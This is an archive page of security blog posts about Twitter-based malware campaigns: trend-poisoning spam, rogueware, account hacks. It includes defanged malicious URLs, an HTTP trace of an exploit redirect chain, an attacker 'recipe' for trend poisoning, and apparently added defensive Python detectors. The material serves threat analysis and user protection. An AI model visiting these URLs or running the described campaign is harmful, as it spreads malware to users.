Tag Archive | "Twitter"

Lil Wayne’s Twitter account shut down after hack attack

Lil Wayne’s Twitter account has been taken offline, after someone hacked into the popular rapper’s account this weekend and posted a series of joke messages.

A hacker, who seemingly guessed the singer’s password, sent a series of bizarre messages to Lil Wayne’s 1.2 million followers – including rude tweets to celebrity pals 50 Cent, Soulja Boy and The Game. According to AllHipHop.com, some of the language used was highly offensive.

Mind you, any fan of music like that is probably used to distasteful language.

Lil Wayne's Twitter account

Lil Wayne has now shut down his Twitter account, which went by the name @liltunechi. To be honest, he hasn’t had the best of times on Twitter – his page was previously hacked late last year, with fake news being posted about upcoming performances.

Clearly if he can’t keep control of his Twitter account, it’s better that it be disabled.

If nothing else, this case proves that just because a Twitter account is “verified” it doesn’t mean that it really is the celebrity (or an authorised representative) who is doing the tweeting.

Other celebrities who have had their Twitter accounts hacked in the past include Axl Rose, politician Ed Miliband, Britney Spears and plummy-voiced TV property crumpet Kirsty Allsopp.

Make sure that you always choose a non-dictionary word that’s hard to guess as your Twitter password, and never use the same password on multiple websites.

Also, be on your guard against phishing sites and ensure that your computer is running up-to-date anti-virus software to protect against keylogging spyware which may attempt to steal your information.

Finally, consider carefully which third-party applications and websites you allow to connect with your Twitter account.

Full story: Naked Security – Sophos

Posted in Antivirus

Backgrounds of the current Twitter Spam mails increase

Full story: a-squared – English

Posted in Antivirus

Twitter Trend Poisoning Cookbook

We have become familiar enough with malware creators poisoning popular search engine terms through SEO techniques in order to deliver their malicious files to a greater pool of unsuspecting users. Other popular services such as Twitter have not escaped the watchful eyes of the miscreants. This attack involves pumping out many of the same tweets with different accounts to push them into the Twitter trending list. That way more people are likely to see them even if the individual user accounts being used to send the tweets don't have that many followers. Incidentally many of the accounts used in this attack don't have that many followers and are quite fresh – meaning they are probably fake accounts set up specifically for the purpose of spamming tweets.

To carry out this kind of attack, the miscreants are clearly following a tried-and-tested recipe, borrowed from SEO-based attacks and tweaked for Twitter.

The recipe goes something like this:

  1. See what's in fashion
  2. Find a suitable host
  3. Mask the URLs
  4. Start spreading the news
  5. Repeat until cooked

1. See what's in fashion
The miscreants are a pretty smart bunch when it comes to Web marketing. They do the research to know what people are interested in. They typically watch for the latest newsworthy events or occasions and then zero in on them as the hook for their campaign. Attackers can watch the latest trending topics on Twitter to see what people are currently most interested in.

On December 2nd, one of the hooks used was the Jewish holiday, Hanukkah. As you can imagine, this step is quite fluid and most likely to change daily, making it hard to recognize and defend against. Once they know what hooks to use, they can then set about creating messages that use social engineering techniques to trick users into clicking on them.

Here are some example messages (note the trending Twitter terms planted randomly into the message):

  • Nobody cares about :) Hanukkah
  • Get me sex, woman, por fa vor! (((((( Advent Calendar
  • Check this link and change your mind 'bout :) ) Sundance
  • Get through this viagra store and read a shocking article about F*****k!!!
  • What's in this trend OMG World AIDS
  • Damned, I didn't know THAT about :( Morgan Freeman

2. Find a suitable host
Like any good parasite, the miscreants need to find a suitable host for their attack. Attackers these days typically choose from a number of ways to host malware. They can use their own hosting, with a bulletproof hosting service. Alternatively they could use a bot under their control, rent a bot, or hack into a third-party website. The latter choice is a low-cost and quite effective option, especially when you consider the shelf life of these attacks—there is little point in investing money in something that will be terminated in a few days.

Once a suitable host server is found, the choice is whether to attach the malcode to existing pages using a redirect or iframe or to create brand new pages specifically to host the malcode. The first option has the bonus of catching unsuspecting visitors to the site, as well as any traffic driven to the site by the attackers themselves. The second option limits the victims to those that the attackers direct to the page, but the advantage here is that the page can stay below the radar (i.e. if the page is not linked into any part of the real web site, nobody is likely to find it unless they went looking for it).

3. Mask the URLs
Masking URLs is clearly of great benefit to malware creators. Some URL-shortening services are used by mainstream publications and services like Twitter in order to conserve space. The downside is that the final destination of the link is hidden. Because of this obfuscation, it is more difficult for users to recognize risky domains, let alone block them. Some URL-shortening services are better than others insofar as they offer previewing capabilities. In the case of tiny.cc, it even offers a stats page where anybody can see how many hits were made as well as the destination of the shortened URL. Some services, such as bit.ly, have also integrated link blacklisting services, automatically filtering out attempts to create shortened links to known malware sites.

Based on the click stats of the shortened URLs (tiny.cc) used in this attack, we can see that a very large number of users may have potentially been compromised in this attack:

  • tiny.cc/swkw4 — 42340 clicks
  • tiny.cc/3cxal — 42527 clicks
  • tiny.cc/v123p — 42564 clicks
  • tiny.cc/isuny — 43678 clicks

As far as we can tell, the shortened URLs were only created on December 1st.

At this time, we have noted that the masked URLs end up at either mybuger.info or ljivore.info (through several levels of redirection). Mybuger.info uses a social engineering trick, asking the user to download a file to view a video (activex.exe – detected as Trojan.Bamital). Note that the URL in the browser says bestvideo.has.it but the content is actually from mybuger.info.

The ljivore.info site hosts several exploits including:

Successful exploitation will result in the download and installation of the same executable file as found on mybuger.info.

4. Start spreading the news
Once the initial groundwork is done, the attackers need to get their malicious content to as wide a pool of people as possible. It is likely that the attackers have at their disposal a large collection of accounts from which they can automate the sending of messages. Automation of tweets can be quite easily done by creating bots to periodically and randomly send tweets from a predefined selection of messages created in step one, adding a shortened URL from step three. As the number of accounts used is likely to be quite large and the tweets frequent, the likely overall effect is to push these tweets into the live Twitter feeds when users go to check the trending topics. In addition, the tweets also make use of features such as hashtags to help them reach an even wider audience.

While many of the accounts used appear to be created for the purpose of the attack, there may be some accounts used that are legitimate accounts that have been hacked. The advantage of tweeting through hacked accounts is that the account may already have a built-in network of followers. By tweeting through such an account you tweet to all its followers. This is indeed a powerful way to spread the news.

5. Repeat until cooked
The last step of the process is to repeat the previous steps as necessary until the goal is achieved. It is likely that the goal here is to make money (e.g. affiliate schemes). The final payload downloaded is Trojan.Bamital, which is used for manipulating search results to include links to adverts and so forth. Because this is a profit-driven exercise, the attacker is likely to have an operational process that continually monitors and adjusts each step of the process to keep it working in an optimal manner, maintaining the flow of money. Despite the section title, this metaphorical goose is never going to be cooked, so the process will continue indefinitely until either the money-making avenues are closed or these guys are put out of business, neither of which is likely to happen anytime soon.

Staying safe
In the meantime our best advice is to be wary of bizarre-looking messages on Twitter, particularly those found in the trending feeds, and to avoid following the links. To their credit, Twitter has put in place processes to stem the flow of malicious tweets coming from trend abusers.

Using a URL filtering/rating service such as Norton Safe Web can help to keep you away from malicious sites. As this attack makes extensive use of software vulnerabilities, it is important to keep any installed software up to date, applying relevant security patches as they are made available. Finally, keeping your antivirus and firewall software active and up to date is always a good idea.
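The recipe above has a defender-side mirror image: the same tweet template is sent by many distinct, newly created, follower-poor accounts, with a trending term swapped in and a shortened URL attached. The following detector is an added example written for this page (it is not Symantec's code, and Twitter's own anti-abuse logic is not public). The trend terms and shortener hosts are taken from the posts on this page; the account-age and follower thresholds and the sample feed are constructed assumptions.

```python
import re
from collections import defaultdict

# Trending terms the post says were planted into the spam tweets. In a live
# deployment this list would be refreshed from the current trend feed.
TRENDS = ["hanukkah", "advent calendar", "sundance", "world aids",
          "morgan freeman", "grinch"]

# Shortener hosts named in the posts on this page.
SHORTENERS = {"tiny.cc", "bit.ly", "tinyurl.com", "alturl.com", "doiop.com",
              "urlcut.com", "yep.it", "shortlinks.co.uk"}

URL_RE = re.compile(r"https?://([^/\s]+)(?:/\S*)?", re.I)


def normalize(text):
    """Reduce a tweet to its template: drop URLs, planted trend terms,
    emoticons and punctuation, so copies that differ only in the hook collide."""
    t = URL_RE.sub(" ", text.lower())
    for term in TRENDS:
        t = t.replace(term, " ")
    t = re.sub(r"[^a-z0-9 ]+", " ", t)
    return " ".join(t.split())


def planted_trends(text):
    t = text.lower()
    return {term for term in TRENDS if term in t}


def shortener_hosts(text):
    return {m.group(1).lower() for m in URL_RE.finditer(text)
            if m.group(1).lower() in SHORTENERS}


def find_campaigns(tweets, min_accounts=3, fresh_days=30, max_followers=20):
    """Group tweets by template and flag groups that look like trend poisoning:
    several distinct accounts, mostly new and follower-poor, all carrying a
    shortened URL. The thresholds are assumptions, not figures from the post."""
    clusters = defaultdict(list)
    for tw in tweets:
        clusters[normalize(tw["text"])].append(tw)

    flagged = []
    for template, group in clusters.items():
        accounts = {tw["account"] for tw in group}
        if len(accounts) < min_accounts:
            continue
        fresh = sum(1 for tw in group
                    if tw["age_days"] < fresh_days and tw["followers"] <= max_followers)
        hosts = set().union(*(shortener_hosts(tw["text"]) for tw in group))
        trends = set().union(*(planted_trends(tw["text"]) for tw in group))
        if hosts and fresh / len(group) >= 0.5:
            flagged.append({"template": template, "accounts": len(accounts),
                            "fresh_accounts": fresh, "shorteners": sorted(hosts),
                            "trends": sorted(trends)})
    return flagged


# Constructed sample feed: three throwaway accounts push one template with
# different hooks, two legitimate users mention the same trends, and a second
# template is pushed by only two accounts (below the threshold).
SAMPLE_TWEETS = [
    {"account": "fresh01", "age_days": 2, "followers": 3,
     "text": "Nobody cares about :) Hanukkah http://tiny.cc/swkw4"},
    {"account": "fresh02", "age_days": 1, "followers": 0,
     "text": "Nobody cares about Grinch :) http://tiny.cc/3cxal"},
    {"account": "fresh03", "age_days": 5, "followers": 7,
     "text": "nobody cares about Sundance http://tiny.cc/v123p"},
    {"account": "oldfriend", "age_days": 900, "followers": 450,
     "text": "Nobody cares about the Grinch? I do! Hanukkah party tonight"},
    {"account": "realuser", "age_days": 700, "followers": 300,
     "text": "Lighting the candles for Hanukkah tonight http://example.com/photo"},
    {"account": "fresh04", "age_days": 3, "followers": 1,
     "text": "Damned, I didn't know THAT about :( Morgan Freeman http://bit.ly/hLJhq4"},
    {"account": "fresh05", "age_days": 4, "followers": 2,
     "text": "Damned, I didn't know THAT about Advent Calendar http://tiny.cc/isuny"},
]

if __name__ == "__main__":
    for hit in find_campaigns(SAMPLE_TWEETS):
        print(hit)
```

Normalizing away the planted trend term is what makes the clustering work: the attacker varies exactly that word per tweet, so matching on raw text would see six unrelated messages instead of one template. The legitimate accounts survive because their wording differs and they carry no shortener link.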

The various files used in this attack are detected by Symantec with the following signatures:

IPS-enabled products are also capable of blocking the redirections and do so with this signature:
HTTP Malicious Toolkit IFrame Injection

For more information on social networking based attacks and how to avoid them, please see Candid Wueest's excellent paper.

Thanks to Piotr Krysiuk for his technical contributions.

– Hon Lau on Symantec Connect – Security Response – Blog Entries

Posted in Antivirus

Twitter used for Rogueware Distribution

Cyber criminals are using social media more frequently to distribute their malicious creations. Pft! As if Blackhat SEO, fake advertisements, and hacked websites weren’t enough?!

Today we’ll take a look at a Rogueware campaign using Twitter for distribution.  Several fake profiles (and compromised ones too) started tweeting “a very good antivirus” followed by a shortened link.

A very "good" antivirus

Clicking the link in Firefox leads us to a fake Firefox warning screen, which attempts to social engineer users into believing that Firefox is prompting for a security update.

Fake Firefox Security Alert

Once “Start Protection” is clicked, the user is prompted to install Setup.exe, which we detect as Adware/ThinkPoint.  After the malware is installed, the computer prompts to restart.

Once the computer is restarted, the following screen appears:

ThinkPoint Rogueware

The software then automatically performs a “scan” and reports a number of fake issues:

ThinkPoint Scan

Of course, their solution is to purchase the software! Don’t!

This was a relatively small campaign, but it’s common for cyber criminals to test the waters before taking a dive into the deep end.  We expect to see these social media malware campaigns throughout 2011.

– Sean-Paul Correll on PandaLabs Blog

Posted in Antivirus

Blog: Twitter, Leaks and Spam

It’s quite common to see attackers use hot topics on social networks to force users to click on malicious links. So what would be more interesting these days than using the term “Wikileaks”? – on Securelist / All Updates

Posted in Antivirus

Dont Get Caught by the Grinch on Twitter

Last year we documented the very first trending topic attack on Twitter. The attack is similar to a Blackhat SEO campaign, where criminals leverage the many hot topics discussed on the Internet in order to position their malware campaigns in highly visible places on Twitter. Earlier today we noticed over 300 Twitter accounts targeting various trending topics on Twitter. Thousands of Tweets ranging from “Nobody cares about Hanukkah” to “Shocking video of the Grinch” were accompanied by shortened malicious URLs. Clicking on the link would lead to a fake codec site, which would then attempt to exploit your system with a PDF vulnerability (CVE-2010-2883) on top of prompting you to download a malicious “codec,” which in reality is a generic Trojan downloader.

Tweets sent out for just one malicious URL

Malicious Tweet:

Twitter Trending Topic Attack - Nobody cares about Hanukkuh

Infection site:

Twitter Trending Topic Attack - Malicious Site

Other targeted topics include:

  • Grinch
  • Hanukkah
  • Advent calendar
  • Carling cup
  • AIDS Awareness
  • Morgan Freeman
  • Sundance
  • Gruden

These attacks are not as frequent as the Blackhat SEO attacks we observe on a daily basis, but they do pop up from time to time. We have always suggested avoiding any links in the trending topic area of Twitter for this very reason.

Keep your computer safe this Christmas

With the increased risk over the holiday period, PandaLabs offers users a series of practical security tips for using social media:

1) Don’t click suspicious links from non-trusted sources. This should apply to messages received through Twitter, through other social networks and even via email.

2) If you click on the links, check the target page. If you don’t recognize it, close your browser.

3) Even if you don’t see anything strange in the target page, but you are asked to download something, don’t accept.

4) Install all available operating system updates and patches. Cyber-criminals are particularly skilled at exploiting critical vulnerabilities in operating systems and commonly used applications. Computer users are often silently redirected to a website with a carefully crafted malicious payload that leaves the computer infected with data-stealing malware or extortion-based threats. In addition to updating your system, PandaLabs strongly advises people to update Adobe Flash, Adobe Reader and Java software, which are all commonly targeted by cyber criminals.

5) If you do download or install an executable file and the PC starts to launch messages or behaves strangely, there is probably malware on your computer. In this case, you should check your computer with a free online scanner such as ActiveScan, available at: www.activescan.com.

6) As a general rule, make sure your computer is well protected to ensure that you are not exposed to the risk of infection from any malicious code. You can protect yourself with the new, free Panda Cloud Antivirus solution (www.cloudantivirus.com).

– Sean-Paul Correll on PandaLabs Blog

Posted in Antivirus

Twitter Trending Topic Attack (II)

There was an attack targeting various trending topics on Twitter today. I’ve been analyzing the campaign and have collected the following information:

(Malware and Maltego file available upon request.  Shoot me a message on Twitter.)

  • 311 accounts were involved in the attack
  • Many of these Twitter handles were harvested between May and July of last year (!), which leads me to believe that it originated from the same group of people from last year’s attack that took place around June. (http://pandalabs.pandasecurity.com/visualizing-the-twitter-trends-attack/)
  • The bulk of the attack took place 8 hours ago.
  • 11 shortened URLs
  • Site contains asx file pointing to exploits
  • Site attempts to exploit PDF vulnerabilities (object 17.0 contains SING table overflow CVE-2010-2883)
  • Generic downloader Trojan

Maltego view of the malicious tweets for one of the malicious URLs

Twitter Trending Topic Attack

Here are the shortened URLs used in the attack:

Warning: These URLs point to malicious sites that contain live exploits.

hxxp://shortlinks.co.uk/2o10

hxxp://urlcut.com/1yoec

hxxp://doiop.com/li7h90

hxxp://tiny.cc/swkw4

hxxp://tiny.cc/isuny

hxxp://tinyurl.com/32eothq

hxxp://tiny.cc/v123p

hxxp://alturl.com/fb6cb

hxxp://doiop.com/c0ae2b

hxxp://bit.ly/hLJhq4

hxxp://yep.it/powmfk

Here is the traffic right after we click on a link in Twitter:

GET hxxp://shortlinks.co.uk/2o10

302 Found to hxxp://briceguilbert.com/about.html

GET hxxp://briceguilbert.com/about.html

304 Not Modified ()

GET hxxp://twitter.com/scribe?r=3915&log%5B%5D=%7B%22component%22%3A%22dashboard%22%2C%22trends%22%3A%5B%7B%22trend%22%3A%22%23Share%22%2C%22rank%22%3A0%2C%22promoted_content_id%22%3A83%7D%2C%7B%22trend%22%3A%22%232010disappointments%22%2C%22rank%22%3A1%7D%2C%7B%22trend%22%3A%22%23lilkimmustfeellike%22%2C%22rank%22%3A2%7D%2C%7B%22trend%22%3A%22%23frasesquemarcaron%22%2C%22rank%22%3A3%7D%2C%7B%22trend%22%3A%22Nominations%22%2C%22rank%22%3A4%7D%2C%7B%22trend%22%3A%22Hanukkah%22%2C%22rank%22%3A5%7D%2C%7B%22trend%22%3A%22Grinch%22%2C%22rank%22%3A6%7D%2C%7B%22trend%22%3A%22Kyrie%20Irving%22%2C%22rank%22%3A7%7D%2C%7B%22trend%22%3A%22World%20AIDS%22%2C%22rank%22%3A8%7D%2C%7B%22trend%22%3A%22Chabelo%22%2C%22rank%22%3A9%7D%5D%2C%22page%22%3A%22search%22%2C%22_category_%22%3A%22webclient%22%2C%22event_name%22%3A%22trend-impression%22%2C%22ts%22%3A1291267543912%7D&log%5B%5D=%7B%22component%22%3A%22dashboard%22%2C%22trends%22%3A%5B%7B%22trend%22%3A%22%23Share%22%2C%22rank%22%3A0%2C%22promoted_content_id%22%3A83%7D%2C%7B%22trend%22%3A%22%232010disappointments%22%2C%22rank%22%3A1%7D%2C%7B%22trend%22%3A%22%23lilkimmustfeellike%22%2C%22rank%22%3A2%7D%2C%7B%22trend%22%3A%22%23frasesquemarcaron%22%2C%22rank%22%3A3%7D%2C%7B%22trend%22%3A%22Nominations%22%2C%22rank%22%3A4%7D%2C%7B%22trend%22%3A%22Hanukkah%22%2C%22rank%22%3A5%7D%2C%7B%22trend%22%3A%22Grinch%22%2C%22rank%22%3A6%7D%2C%7B%22trend%22%3A%22Kyrie%20Irving%22%2C%22rank%22%3A7%7D%2C%7B%22trend%22%3A%22World%20AIDS%22%2C%22rank%22%3A8%7D%2C%7B%22trend%22%3A%22Chabelo%22%2C%22rank%22%3A9%7D%5D%2C%22page%22%3A%22search%22%2C%22_category_%22%3A%22webclient%22%2C%22event_name%22%3A%22trend-impression%22%2C%22ts%22%3A1291267572467%7D

200 OK (text/javascript)

GET hxxp://bestivideos.has.it/

200 OK (text/html)

GET hxxp://bestivideos.has.it/ad.html

304 Not Modified ()

GET hxxp://mybuger.info/flash/

304 Not Modified ()

GET hxxp://nht-2.extreme-dm.com/n2.g?login=todd&pid=kickad&jv=y&j=y&srw=1024&srb=16&l=hxxp%3A//bestivideos.has.it/

200 OK (image/gif)

GET hxxp://ljivore.info/folder/index.php?f85f8c52a26c60a4b4aed5232760bc83

200 OK (text/html)

GET hxxp://mybuger.info/flash/error.jpg

404 Not Found (text/html)

GET hxxp://ljivore.info/folder/images/43abbf45f97a3d649961cf9f6854c6a6.asx

200 OK (video/x-ms-asx)

GET hxxp://ljivore.info/folder/images/np/43abbf45f97a3d649961cf9f6854c6a6/f3a350ffbd6b32a3b3f0d29ebf395ab8.pdf

200 OK (application/pdf)
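Captures like the one above are most useful when the request/response pairs are turned into a structured record: which hosts were contacted, where the shortener redirected, and which responses delivered a file rather than a page (here an ASX playlist and a PDF, the vector for the CVE-2010-2883 exploit named earlier). The parser below is an added example written for this page, not the blog author's tooling; it reads the defanged `hxxp://` notation as used in the post. The request and response line formats are those of the trace above; the set of content types treated as payloads is an assumption, and the sample trace is a subset of the capture above with the long twitter.com logging request omitted.

```python
import re
from urllib.parse import urlparse

# "GET hxxp://host/path" request lines, as written in the capture.
REQ_RE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s*$")
# "302 Found to <url>", "304 Not Modified ()", "200 OK (text/html)" response lines.
RESP_RE = re.compile(r"^(\d{3})\s+(.*?)(?:\s+to\s+(\S+))?(?:\s*\(([^)]*)\))?\s*$")

# Content types that mean a file was delivered rather than a page rendered.
# This set is an assumption; the first two are the types seen in the trace.
PAYLOAD_TYPES = {"application/pdf", "video/x-ms-asx",
                 "application/octet-stream", "application/x-msdownload"}

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def refang(url):
    """Turn the defanged hxxp:// / hxxps:// form used in write-ups back into a
    URL that urlparse understands. Output keeps the defanged form elsewhere."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def parse_trace(text):
    """Pair each request line with the response line that follows it."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = REQ_RE.match(line)
        if m:
            current = {"method": m.group(1), "url": m.group(2),
                       "status": None, "location": None, "ctype": None}
            records.append(current)
            continue
        m = RESP_RE.match(line)
        if m and current is not None:
            current["status"] = int(m.group(1))
            current["location"] = m.group(3)
            current["ctype"] = (m.group(4) or "").strip() or None
            current = None  # one response per request
    return records


def summarize(records):
    """Extract the indicators a responder wants: hosts, redirect hops, file payloads."""
    hosts, redirects, payloads = set(), [], []
    for r in records:
        host = urlparse(refang(r["url"])).hostname
        if host:
            hosts.add(host.lower())
        if r["status"] in REDIRECT_STATUSES and r["location"]:
            redirects.append((r["url"], r["location"]))
        if r["status"] == 200 and (r["ctype"] in PAYLOAD_TYPES
                                   or r["url"].lower().endswith(".exe")):
            payloads.append((r["url"], r["ctype"]))
    return {"hosts": sorted(hosts), "redirects": redirects, "payloads": payloads}


# Subset of the capture shown above (the twitter.com logging request is omitted).
TRACE = """\
GET hxxp://shortlinks.co.uk/2o10
302 Found to hxxp://briceguilbert.com/about.html
GET hxxp://briceguilbert.com/about.html
304 Not Modified ()
GET hxxp://bestivideos.has.it/
200 OK (text/html)
GET hxxp://mybuger.info/flash/
304 Not Modified ()
GET hxxp://ljivore.info/folder/index.php?f85f8c52a26c60a4b4aed5232760bc83
200 OK (text/html)
GET hxxp://ljivore.info/folder/images/43abbf45f97a3d649961cf9f6854c6a6.asx
200 OK (video/x-ms-asx)
GET hxxp://ljivore.info/folder/images/np/43abbf45f97a3d649961cf9f6854c6a6/f3a350ffbd6b32a3b3f0d29ebf395ab8.pdf
200 OK (application/pdf)
"""

if __name__ == "__main__":
    for key, value in summarize(parse_trace(TRACE)).items():
        print(key, value)
```

The summary is what feeds blocking and detection: the host list goes to the proxy or DNS blocklist, the redirect pairs document how the shortener hop hid the final host, and the payload list identifies the files to pull for analysis.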

– lithium on Malware Database

Posted in Security

Blog: Malicious Twitter trends

New attack via Twitter is in progress – on Securelist / All Updates

Posted in Antivirus

Twitter: The Internet is a more dangerous place

Twitter has made it extremely easy for people to share news and web links and at the same time has created a boon for online criminals. It is hard to find a web service that has done more to make malware distributors’ jobs easier.

I don’t mean just the explosive growth in the Twitter user base. Microblogging in general, and Twitter specifically, contribute to malware distribution in fundamental ways that must be re-examined and corrected.

Here are the Twitter features that make it so dangerous:

  1. Twitter usernames are easily harvested in vast quantities
  2. Criminals can send tweets to anyone on Twitter
  3. Twitter encourages its users to share without thinking
  4. Twitter and supporting services like bit.ly strip away critical context
  5. Twitter is programmable and can be automated using their published APIs

Twitter features look like an Internet criminal’s wish list.

While each of these features has appeared to some degree in other Internet services like email and instant messaging, Twitter has taken them to a new level and — as icing on the cake — got celebrities like Ashton Kutcher and Miley Cyrus to help fuel the frenzy of massive sharing.

Before describing how these features introduce vulnerabilities hackers can exploit more easily than ever, let’s be clear that this is not Twitter bashing. There is a reason Twitter has become so popular: it clearly meets a need shared by many millions of users. On Twitter.com we see people using the best features of the Internet to be more connected and more informed. But just as we think twice about attending large gatherings during a swine flu pandemic, we should also think twice about sharing links on an infected Internet.

Okay, let’s look at our hacker wish list in more detail.

Twitter usernames are easily harvested in vast quantities

Compared to email, collecting huge lists of Twitter usernames is incredibly easy. Part of the attraction of Twitter is that anyone can see what all the users are up to, including seeing usernames. Showing everyone what everyone else is saying is a great way to encourage new users to join the fun. It’s also a great way to build a list of users to target.

Quality email lists, on the contrary, are harder to build. Malware authors have been very creative in building tools to collect email address lists. The Warezov worm, for example, would scan a PC for email addresses and then send itself to those addresses to continue the process. These worms, however, require a user to open a binary attachment to start the process, and then require the next recipients to do the same.

Warezov and other email worms were pretty darn effective, but gathering lists of Twitter users does not require jumping through such technical and social engineering hoops. The public nature of Twitter usernames, combined with the Twitter API (see below), makes it outrageously easy to “crawl” across Twitter and build massive lists of users.

Here is an interesting look at a Twitter-crawling app created by some good guys — repeat Good Guys! — that demonstrates the concept.

Looking at the image above, it is important to note that not only are lists of usernames easy to build, but relationships between users are also publicly available on Twitter, raising the possibility of targeted attacks against organizations using (seemingly) inside information. (“Harry Reid said you should respond to this: [click here]“)

Criminals can send tweets to anyone on Twitter

Now that we have a huge list of usernames that we generated in a couple of hours, our next step will be to send them malicious links to infect their computers. Before the rise of Twitter, there were other methods malware distributors used to get links in front of people. “Spim” is the term for sending spammy links through an Instant Messaging (IM) network. But the Instant Messaging model calls for users to establish relationships by a two-way handshake. I add a new user to my contact list, they see the request and choose to accept the relationship. Then I can send messages. Now, it is true that malware writers can circumvent this requirement for a handshake but, like the email address harvesting example above, it requires malware engineering to get around protection designed into IM systems. On Twitter there is no such requirement.

Twitter has a similar model wherein I follow you and you follow me. But you do not have to choose to follow me in order to see messages from me. I can follow you, see your tweets, and send a reply that you will see in your reply box. The Replies page is labeled “Tweets mentioning [myusername]“. And on Twitter, who does NOT want to see tweets mentioning them? (Miley Cyrus aside.) Compared to the effort of hacking an IM system to send unsolicited links, Twitter makes it very easy for anyone to send links to arbitrary users.

So I build a huge list of usernames, follow all the users, wait for them to tweet and then reply with: “You are so right and this proves it: [click here]“
At this point, the only thing keeping my huge list of users from clicking the link is a good dose of caution. And Twitter is not about caution. Read on.

Twitter encourages its users to share without thinking

Stepping out of the technical realm for a moment, let’s look at the Twitter social phenomenon. Twitter is not about privacy. Twitter is about massive-scale sharing. The tagline on the Twitter home page is, “Share and discover what’s happening right now, anywhere in the world.” And, “Join the conversation.” THE conversation. Not one on one conversations with your known friends. We’re talking about The Big conversation that we crawled through collecting our usernames up in step one.

Twitter does provide Public or Protected accounts. But the default setting is public and the message is clear: don’t be shy. Jump in the deep end of the pool.

On top of that, the first step you see after creating an account is “See if your friends are on Twitter” and a web form that asks for your Gmail, Yahoo or AOL email password. Yes, your password. Twitter will log into your email account and retrieve your contact list to see if there are matching Twitter accounts. Doesn’t this sound just like our friend Warezov described above?

Of course these are features designed to maximize the number of users and connections between users, and that’s the attraction of Twitter. The sunny day scenario is a positive one that helps build the Big Conversation. What we are doing here is looking at these features with an eye on how they contribute to the spread of malware across the Internet.

So to recap: we have a huge list of usernames with known relationships between users, we can send any of them a link that includes some apparently familiar context even though they don’t know us, and the users are in a hurry. Tweets are short and sweet and meant to be posted and read frequently. This favors the social engineering malware distributor who hopes the users do not spend too much time deciding whether or not to click a link in a tweet.

Twitter and supporting services like bit.ly strip away critical context

Tweets are very short messages that don’t leave a lot of room to establish familiar context. “Check this out: [click here]” is a classic line from emails that distribute malware.

The shortened URLs that appear in tweets remove all the warning signs that indicate dangerous links. When a link appears in your email, an IM message or a tweet it is important to inspect the URL and see where it goes before clicking on it. If we receive a message that looks like it is from a friend asking us to look at their vacation pictures, we have a chance to be suspicious if the URL ends in a .ru (Russia) or .cn (China). It’s not likely that our friends chose a Russian or Chinese photo hosting service. Or if the link is purportedly from our bank but the URL looks like http://aimee.pl345xxx.ru/scripts/infector/clickit.html, we might be wary about clicking it.

Would you be suspicious of this URL?

http://aimee.pl345xxx.ru/scripts/infector/clickit.html

URL shortening services like bit.ly, tinyurl.com or tweetburner remove all the useful context and turn all URLs into generic nonsense. There is no chance for a user to screen out risky URLs when they are shortened.

How about this one?

http://bit.ly/YTmnD

Then there is the risk of someone penetrating the URL shortening service itself and hijacking previously shortened links to point them to malware sites. Over 2 million shortened links were hijacked this summer at URL shortening service Cligs.
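The warning signs this section lists (an unexpected .ru or .cn domain, a shortener that hides everything) are mechanical enough to check automatically before a link is opened. The code below is an added example written for this page, not SafeCentral's or Sucuri's tool. It triages a URL for the signs named in the text plus a few standard ones (credentials before `@`, a bare IP host, deeply nested subdomains), and expands a shortened link by following redirects with a HEAD-style lookup that is injected as a function so the example runs offline; `FAKE_REDIRECTS` is a constructed table, and the bit.ly link's supposed destination is an assumption, not a real resolution of the link on the page.

```python
import re
from urllib.parse import urlparse

# Shortener hosts named in this post.
SHORTENERS = {"bit.ly", "tinyurl.com", "tiny.cc"}
# The post's examples of TLDs a friend's photo site would not normally use;
# tune to what your users actually expect.
WATCH_TLDS = {"ru", "cn"}

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def triage_url(url):
    """Return human-readable warning signs for a link before anyone clicks it."""
    if "://" not in url:
        url = "http://" + url
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if not host:
        return ["no host in URL"]
    findings = []
    if host in SHORTENERS:
        findings.append(f"{host} is a shortener: the real destination is hidden")
    tld = host.rsplit(".", 1)[-1]
    if tld in WATCH_TLDS:
        findings.append(f"country-code TLD .{tld} does not match the claimed sender")
    if p.username is not None:
        findings.append("credentials before '@': the real host is what follows the '@'")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        findings.append("bare IP address instead of a hostname")
    if host.count(".") >= 3:
        findings.append("deeply nested subdomains, often used to imitate a familiar name")
    return findings


def expand(url, fetch, max_hops=5):
    """Follow redirects without rendering the final page. `fetch(url)` must
    return (status, location) as a HEAD request would; it is injected so the
    function can be exercised offline. Returns the full chain of hops."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in REDIRECT_STATUSES or not location:
            break
        if location in chain:  # redirect loop; stop rather than spin
            break
        chain.append(location)
    return chain


# Constructed redirect table standing in for the network (assumption: the
# shortened link on this page is not actually known to resolve here).
FAKE_REDIRECTS = {
    "http://bit.ly/YTmnD": (301, "http://aimee.pl345xxx.ru/scripts/infector/clickit.html"),
    "http://aimee.pl345xxx.ru/scripts/infector/clickit.html": (200, None),
}


def fake_fetch(url):
    return FAKE_REDIRECTS.get(url, (404, None))


def triage_short_link(url, fetch=fake_fetch):
    """Expand, then triage every hop, so a clean-looking shortener cannot
    hide a destination that would have failed the checks on its own."""
    return {hop: triage_url(hop) for hop in expand(url, fetch)}


if __name__ == "__main__":
    for hop, notes in triage_short_link("http://bit.ly/YTmnD").items():
        print(hop, notes or ["no warning signs"])
```

In a real deployment `fetch` would issue a HEAD request with redirects disabled and read the `Location` header; the hop limit and loop check matter because shortener chains are sometimes nested several deep, and the point of the exercise is to see the final host without ever fetching its body.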

Twitter is programmable and can be automated using their published APIs

As I mentioned above, Twitter provides an Application Programming Interface (API) that lets developers create programs to automatically exercise Twitter features. Features that the API does not support can be accessed by automating web requests as described here: Scripting Twitter with cURL.

Countermeasures

As we have seen, Twitter is a feature-rich malware distribution platform with a ready-to-go user base of 25 million Tweeters who are predisposed to do exactly what the bad guys want: click it fast. Here is a short list of things users can do to protect themselves:

  • Protect your tweets: Go into your Twitter settings and click the “Protect my tweets” checkbox at the bottom. This will remove you from the public timeline and only people you approve can follow your tweets and send you replies.
